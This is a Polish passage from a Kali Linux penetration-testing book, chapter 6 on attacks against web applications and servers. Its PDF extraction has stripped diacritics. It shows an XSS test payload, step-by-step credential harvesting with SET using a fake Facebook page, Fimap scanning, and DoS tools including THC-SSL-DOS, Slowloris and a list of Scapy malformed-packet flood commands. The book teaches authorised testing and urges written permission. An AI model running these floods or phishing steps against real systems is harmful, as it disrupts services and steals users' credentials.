1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
